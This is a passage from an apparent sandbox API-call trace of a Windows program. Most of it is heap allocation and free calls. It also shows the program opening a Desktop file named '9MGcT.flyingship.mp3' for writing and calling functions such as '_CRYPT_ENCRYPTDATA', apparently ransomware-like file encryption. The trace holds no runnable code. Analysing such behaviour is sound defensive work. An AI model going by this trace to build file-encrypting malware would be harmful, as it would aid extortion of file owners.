RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0077.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0077.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0077.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0077.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0077.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0077.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0077.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3530 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0077.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0077.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0077.130] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0077.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0077.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0077.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0077.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.131] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0077.131] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0077.131] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0077.131] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0077.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9mgct.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0077.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0077.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0077.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0077.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0077.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0077.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0077.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0077.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0077.132] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0077.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0077.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0077.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0077.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0077.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0077.132] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0077.132] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0077.133] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0077.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0077.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0077.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0077.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x100000) returned 0x32b0020 [0077.134] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0077.134] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x5c46, lpOverlapped=0x0) returned 1 [0077.135] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0077.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0077.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0077.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0077.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5c46) returned 0x6a1f38 [0077.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x32b0020 | out: hHeap=0x650000) returned 1 [0077.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0077.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0077.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0077.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0077.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0077.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5c46) returned 0x795ff8 [0077.138] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0077.138] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.139] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5c46) returned 0x6a1f38 [0077.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0077.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0077.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0077.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0077.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.139] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0077.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0077.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0077.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bb8 [0077.139] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0077.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0077.140] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.140] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0077.140] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb418 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5c46) returned 0x6a1f38 [0077.140] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb3c8 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0077.140] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb648 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0077.140] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb4c8 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0077.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0077.140] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df88 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5c46) returned 0x79bc48 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0077.141] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0077.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0077.142] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0077.142] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0077.142] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0077.142] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0077.142] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0077.142] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0077.142] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0077.143] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.143] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0077.143] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb488 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0077.143] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e3d8 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0077.143] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0077.143] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0077.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.144] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0077.144] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0077.144] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0077.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0077.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0077.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0077.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0077.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.145] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 